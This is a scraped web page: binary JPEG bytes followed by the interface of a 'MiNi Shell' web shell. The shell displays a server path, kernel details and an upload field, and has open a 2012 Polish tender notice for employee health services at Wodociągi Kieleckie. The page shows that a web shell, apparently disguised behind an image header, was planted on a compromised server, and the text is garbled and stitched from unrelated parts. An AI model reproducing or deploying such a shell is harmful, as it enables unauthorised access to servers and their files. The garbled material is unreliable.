JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/74727-N-2012.html

<p class="kh_header"><b>Kielce: Świadczenia zdrowotne dla osób zatrudnionych w Spółce z o.o. Wodociągi Kieleckie.</b><br>
<b>Numer ogłoszenia: 74727 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenia zdrowotne dla osób zatrudnionych w Spółce z o.o. Wodociągi Kieleckie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa  udzielania świadczeń zdrowotnych, pracownikom zatrudnionym w WODOCIĄGACH  KIELECKICH w zakresie:
a) badania wstępne,
b) badania okresowe,
c) badania kontrolne, 
d) zakup szczepionek wraz z wykonaniem szczepień ochronnych pracowników na stanowiskach  pracy zagrożonych czynnikami biologicznymi,
e) badania psychologiczne kierowców i osób kierujących samochodem prywatnym do celów służbowych,
f) udział lekarza w pracach Zakładowej Komisji BHP wraz z wizytacją stanowisk pracy,
g) badania mammograficzne wraz z  USG piersi kobiet powyżej 40 roku życia, 
h) USG  piersi kobiet poniżej 40 roku życia,
i) badanie prostaty wraz z analizą krwi  (PSA),
j) zakup szczepionek wraz z wykonaniem szczepień ochronnych pracowników przeciwko grypie sezonowej.

Ad. a) b) Badania wstępne, okresowe wykonywane będą na podstawie 
Skierowania na badania profilaktyczne oraz załączonego wykazu badań wystawionych przez Sekcję ds. Organizacji i Spraw Osobowych Spółki w placówkach medycznych wskazanych przez Wykonawcę. Badania te winny zostać udokumentowane poprzez wydanie orzeczenia o zdolności lub niezdolności do podjęcia czynności zawodowych na stanowisku pracy wskazanym w Skierowaniu ...

Zakres przedmiotowych badań winien obejmować: 

1.badanie krwi w zakresie:	
- morfologia ogólna,
- OB,
- poziom cukru,
- cholesterol całkowity,
- HDL,
- LDL,
- TG.
2. analiza ogólna moczu,
3. prześwietlenie płuc,
4. EKG,
5. cytologia,
6. badania okulistyczne w zakresie:	
- badanie ostrości wzroku: do dali, do bliży,
- badanie ciśnienia śródgałkowego,
- badanie pola widzenia,
- badanie dna oka,
- badanie widzenia przestrzennego.

Badanie okulistyczne osób ze wskazaniem - praca przy monitorze ekranowym winno być zakończone wydaniem  zaświadczenia o konieczności stosowania okularów korekcyjnych, doborem szkieł korekcyjnych  oraz zleceniem-receptą na ich wykonanie, w sytuacji kiedy przeprowadzone badania wykażą konieczność korekty wzroku.

Jeżeli w trakcie wykonywania  przedmiotowych badań w ww. zakresie, pracownik zrezygnuje z któregokolwiek z nich, oferowaną cenę za te badania należy pomniejszyć o cenę badań niewykonanych (wartość  podana w załączniku nr 3 do formularza ofertowego). Rezygnacja ta winna być potwierdzona podpisem pracownika. 

Zamawiający wymaga wypełnienia załącznika nr 3 do formularza ofertowego poprzez wpisanie cen jednostkowych poszczególnych badań.

Ad. c) Badania kontrolne, będą wykonywane na podstawie 
Skierowania na badania profilaktyczne wystawionego przez Sekcję ds Organizacji     
 i Spraw Osobowych Spółki, w celu ustalenia zdolności do wykonywania pracy na dotychczasowym stanowisku, zgodnie z obowiązującymi przepisami w tym zakresie.

Ad. d) Zakup szczepionek wraz z wykonaniem szczepień ochronnych pracowników na stanowiskach  pracy zagrożonych czynnikami biologicznymi, będą wykonywane w terminach zgodnych z indywidualnym kalendarzem szczepień,     
w placówce wskazanej przez Wykonawcę lub w siedzibie oraz w jednostkach terenowych Zamawiającego, po uprzednim uzgodnieniu terminów. 

Ad. e) Badania psychologiczne kierowców i osób kierujących samochodem prywatnym do celów służbowych, będą wykonywane zgodnie 
z obowiązującymi przepisami w tym zakresie.

Ad. f) Udział lekarza w pracach Zakładowej Komisji BHP  oraz wizytacja stanowisk pracy ; co najmniej raz na kwartał wyjazd lekarza Medycyny Pracy z komisją BHP na obiekty Spółki w celu przeprowadzenia przeglądów stanowisk  pod względem bezpieczeństwa i higieny pracy, kontrola wykonania zaleceń, udział w posiedzeniach komisji.

Ad. g) Badania mammograficzne wraz z  USG, dla kobiet powyżej 40 roku życia, wykonywane będą w roku 2012 w jednostce medycznej wskazanej przez Wykonawcę, w terminie uzgodnionym z Zamawiającym. Zamawiający wymaga, aby badanie mammograficzne i badanie USG były realizowane w tym samym dniu (jedno po drugim) na terenie tej samej placówki medycznej. Orientacyjną ilość osób do wykonania przedmiotowego badania zawiera załącznik nr 2, Formularz do wyliczenia wartości zamówienia.

Ad. h) Badania USG piersi  kobiet poniżej 40 roku życia, wykonywane będą w roku 2012 w jednostce medycznej wskazanej przez Wykonawcę, w terminie uzgodnionym 
z Zamawiającym. Orientacyjną ilość osób do wykonania przedmiotowego badania zawiera załącznik nr 2, Formularz do wyliczenia wartości zamówienia.

Ad. i) Badanie prostaty wraz z analizą krwi (PSA), wykonywane będą w roku 2012 
w jednostce medycznej wskazanej przez Wykonawcę, w terminie uzgodnionym 
z Zamawiającym, orientacyjną ilość osób do wykonania przedmiotowego badania zawiera załącznik nr 2,  Formularz do wyliczenia wartości zamówienia.

Ad. j)  Zakup szczepionek przeciwko grypie sezonowej wraz z wykonaniem szczepień ochronnych pracowników.
Wykonawca zobowiązany jest zakupić szczepionki  przeciw grypie w ilości wskazanej przez Zamawiającego. Przed wykonaniem zabiegu lekarz winien przeprowadzić badanie pracowników. Szczepienia ochronne przeciwko grypie sezonowej, będą wykonywane na przełomie III i IV kwartału w latach obowiązywania umowy, w siedzibie oraz  w jednostkach terenowych Zamawiającego. 
Szczepienia przeciwko grypie należy wycenić kompleksowo w zł/osobę, uwzględniając: 
- koszt szczepionki,
- koszt pracy personelu medycznego (lekarz, pielęgniarka),
- koszt materiałów niezbędnych do właściwego wykonania usługi.

Zamawiający zapewni Wykonawcy transport do siedziby i jednostek terenowych Spółki. Jeżeli lekarz podczas badania stwierdzi  niedyspozycję-chorobę pracownika, Wykonawca zapewni wykonanie szczepienia w terminie uzgodnionym  
z Zamawiającym w placówce Wykonawcy.

2. Ogólne warunki świadczenia usługi.

2.1 Przedmiot zamówienia winien być realizowany zgodnie z:
- Ustawą z dnia 27 czerwca 1997r. O służbie  medycyny pracy (tekst jednolity  Dz. U. 2004 nr 125 poz. 1317 z późniejszymi zmianami) ,
- Rozporządzeniem Ministra Zdrowi i Opieki Społecznej z dnia 30 maja 1996 r.         
w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. 1996 nr 69 poz. 332 
z późniejszymi zmianami),
- Rozporządzeniem Ministra Zdrowia z dnia 15 kwietnia 2011 r. zmieniające rozporządzenie w sprawie badań lekarskich kierowców i osób ubiegających się         
o uprawnienia do kierowania pojazdami (Dz. U. 2011 Nr 88 poz. 503).

2.2 Zamawiający wymaga, aby świadczenia w zakresie przedmiotu zamówienia określone z punktach a, b, c, oraz e realizowane były w placówce wskazanej przez  Wykonawcę w dni robocze w godzinach od 7:00 do 18:00. 

2.3 Zamawiający dopuszcza zlecenie badań: mammografia, USG i prostata,  innemu Wykonawcy tj. placówce ochrony zdrowia która wykonuje tego typu badania specjalistyczne. 
- Placówka wykonująca badania mammograficzne i USG, zobowiązana jest do dostarczenia wyników badań, w zaklejonych kopertach z nazwiskiem osoby badanej do siedziby Zamawiającego w terminie 14 dni od daty wykonania badania.
- Laboratorium wykonujące badanie krwi (PSA), zobowiązane jest do przekazania wyników badań, w zaklejonych kopertach z nazwiskiem osoby badanej do siedziby Zamawiającego w terminie 14 dni od daty wykonania badania.

2.4 Zamawiający nie dopuszcza możliwości wykonywania świadczeń medycznych będących przedmiotem zamówienia poza terenem miasta Kielce - powyższe nie dotyczy szczepień wykonywanych w jednostkach terenowych Spółki. 

2.5 Okresem rozliczeniowym realizacji przedmiotu zamówienia będzie miesiąc kalendarzowy. Po zakończeniu każdego miesiąca, Wykonawca wystawi fakturę VAT za przeprowadzone badania lekarskie. Do faktury Wykonawca zobowiązany jest załączyć: 
- imienne zestawienia osób poddanych badaniom wraz z zakresem wykonanych badań, 
- przeliczenie wykonanego zakresu badań przez ich cenę jednostkową, zgodnie z ceną podaną w załączniku nr 3 oraz wyliczenie łącznej kwoty za wykonane badania.

2.6 Szacunkową ilość świadczeń medycznych w okresie obowiązywania umowy,
 zawiera Formularz do wyliczenia wartości zamówienia, stanowiący Załącznik nr 2.
	
2.7 Wodociągi Kieleckie Spółka z o.o. zastrzega sobie prawo do zmniejszenia ilości zleconych świadczeń, co nie będzie odstąpieniem od warunków umowy. Rzeczywista ilość świadczeń wynikać będzie z bieżących potrzeb Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego, stanowiącego nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.12.10.00-3, 85.14.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku wymagane jest aby Wykonawca świadczący usługi objęte przedmiotem zamówienia był jednostką uprawnioną do ich realizacji zgodnie z obowiązującymi przepisami prawa, a w szczególności:
 - Ustawą o działalności leczniczej z dnia 15 kwietnia  2011 r. (Dz. U. 2011 Nr 112, 
poz. 654),
- Rozporządzeniem Ministra Zdrowia  z dnia 20 lipca 2011 r. w sprawie kwalifikacji wymaganych od pracowników na poszczególnych rodzajach stanowisk pracy 
w podmiotach leczniczych niebędących przedsiębiorcami (Dz. U. 2011 Nr 151 
poz. 896),
- Ustawą o zawodzie lekarza i lekarza dentysty z dnia 5 grudnia 1996 r. (tekst jednolity Dz. U. z 2011 r. Nr 277, poz. 1634),
- Ustawą o zawodzie pielęgniarki i położnej z dnia 15 lipca 2011 r. (Dz. U. 2011 Nr 174, poz. 1039 ), 
- Rozporządzeniem Ministra Zdrowia w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej z dnia 2 lutego 2011 r. (Dz. U. 2011 Nr 31, poz. 158).

W celu potwierdzenia spełnienia tego warunku Wykonawca winien załączyć do oferty oświadczenie, wzór oświadczenia stanowi załącznik nr 5.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykonanie przez Wykonawcę w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, jeżeli okres działalności jest krótszy to w tym okresie świadczeń medycznych odpowiadających swoim rodzajem przedmiotowi zamówienia u  co najmniej 2 odbiorców. Wskazani odbiorcy muszą być firmą, która zatrudnia na etacie nie mniej niż 200 pracowników. W celu potwierdzenia spełnienia tego warunku, Zamawiający żąda złożenia oświadczenia o wykonanych lub wykonywanych świadczeniach medycznych z podaniem odbiorców i  dat - wzór oświadczenia stanowi załącznik nr 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest aby Wykonawca posiadał zaplecze niezbędne do realizacji przedmiotu zamówienia. W celu potwierdzenia spełnienia tego warunku, Zamawiający żąda złożenia:

-oświadczenia z wykazem placówek medycznych w których będzie realizowany przedmiot zamówienia z podaniem ich nazw i adresów- wzór oświadczenia stanowi załącznik nr 7.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest aby Wykonawca dysponował osobami zdolnymi do wykonywania usługi. W celu potwierdzenia spełnienia tego warunku, Zamawiający żąda złożenia:

- oświadczenie z imiennym wykazem specjalistycznego personelu medycznego wraz 
z podaniem godzin pracy w poszczególnych dniach tygodnia, oraz informację 
o podstawie  dysponowania tymi osobami - wzór oświadczenia stanowi załącznik nr 8.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku kiedy Wykonawcy występują wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać:
- wskazanie postępowania którego dotyczy, 
- Wykonawców ubiegających się wspólnie o zamówienie,
- zakres umocowania pełnomocnika,
-oświadczenie o przyjęciu wspólnej odpowiedzialności za wykonanie lub  nienależyte  wykonanie zamówienia. 
Winien on być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze. Dokument pełnomocnictwa należy przedstawić w formie oryginału. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik.
Warunki udziału w postępowaniu mogą być spełnione przez każdego 
z Wykonawców osobno lub mogą je spełniać wspólnie, natomiast warunki braku podstaw do wykluczenia musi spełniać każdy Wykonawca samodzielnie.
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Lokalizacja - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wybranemu Wykonawcy, Zamawiający wskaże termin i miejsce podpisania umowy. 
Warunki przyszłej umowy  z wybranym w wyniku przetargu Wykonawcą zawiera załączony do Specyfikacji Istotnych Warunków Zamówienia  wzór  umowy - załącznik  nr 10.

W trakcie realizacji usługi, Zamawiający przewiduje zmianę zapisów treści umowy 
w zakresie:

a) zmiany organizacji spełniania świadczenia usługi w przypadkach:

-   zmiany miejsca - adresu placówki realizującej usługę, z zachowaniem ilości placówek medycznych realizujących usługę, ilość ta  nie może być inna niż podana w ofercie,

-  zmiany placówki  medycznej wskazanej jako podwykonawca, dotyczy badań mammograficznych, USG i prostaty.

zmiany opisane w punkcie a) nie będą skutkowały zmianą wartości umowy. 

b) inne zmiany:

- w przypadku ustawowej  zmiany stawki podatku VAT od towarów i usług; Zamawiający dopuszcza zmianę wynagrodzenia o kwotę wynikającą ze zmiany podatku VAT, naliczonego od wartości netto niezrealizowanej części przedmiotu umowy, z przyczyn niezawinionych przez Wykonawcę w dacie zmiany stawki podatku,

- rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy ( podane ilości badań są wielkościami przybliżonymi ), w tym przypadku wynagrodzenie Wykonawcy zostanie zapłacone za wykonane świadczenia medyczne,

- termin realizacji umowy może ulec skróceniu w przypadku wcześniejszego wyczerpania kwoty brutto przeznaczonej na realizację zamówienia, chyba że Zamawiający może
 zwiększyć tę kwotę.

zmiany opisane w punkcie b) będą skutkowały zmianą wynagrodzenia.

c) dodatkowo: 
- zmiany wskazane powyżej stanowią katalog zmian na które Zamawiający może wyrazić zgodę i nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Kieleckie Sp. z o.o. Biuro Obsługi Klienta, 25-701 Kielce, ul. Krakowska 64..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 09:45, miejsce: Wodociągi Kieleckie Sp. z o.o. Biuro Obsługi Klienta, 25-701 Kielce ul. Krakowska 64..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com